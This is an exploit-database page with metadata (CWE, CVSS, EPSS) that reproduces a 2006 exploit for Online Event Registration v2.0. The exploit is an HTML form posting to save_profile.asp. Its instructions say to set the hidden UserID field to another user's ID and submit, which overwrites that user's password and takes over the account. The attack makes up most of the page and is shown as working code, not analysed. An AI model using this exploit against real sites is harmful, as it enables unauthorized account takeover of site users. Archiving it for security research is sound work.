Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit

CVE	Category	Price	Severity
N/A	CWE-200	N/A	High

Author	Risk	Exploitation Type	Date
N/A	High	Remote	2006-11-30

CPE	PURL
cpe:cpe:/a:online-event-registration:online-event-registration-v2.0	pkg:https://exploitalert.com/view-details/online-event-registration-v2-0-save-profile-asp-remote-user-pass-change-exploit

CVSS	EPSS	EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H	0.02192	0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006110091

Below is a copy:

<!--

# Title  :   Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit
# Author :   ajann

[Code]]]
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="save_profile.asp?key=1&regkey=">
User Name<input type="hidden" name="UserID" size="4">
<input type="text" name="UserName" size="20" class="TBox" value="Demo Account" maxlength="40">
<input type="text" name="Company" size="40" class="TBox" value="Demo Account">
Email<input type="text" name="EmailAddress" size="40" class="TBox" value="demo (at) codewidgets (dot) net [email concealed]" maxlength="40">
Phone<input type="text" name="Phone" size="20" class="TBox" value="780-429-2318" maxlength="14">
Fax<input type="text" name="Fax" size="20" class="TBox" value="780-429-2319">
Password<input name="Password" size="20" class="TBox" value="demo" maxlength="10">
<input type="submit" value="Submit" name="B1" class="PButton">
</form>
</body>
</html>

<!--
[/Code]]]

Change: <input type="hidden" name="UserID" size="4"> => ID

Next Click "Profile"

#ajann,Turkey
#...

#Im Not Hacker!
-->

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum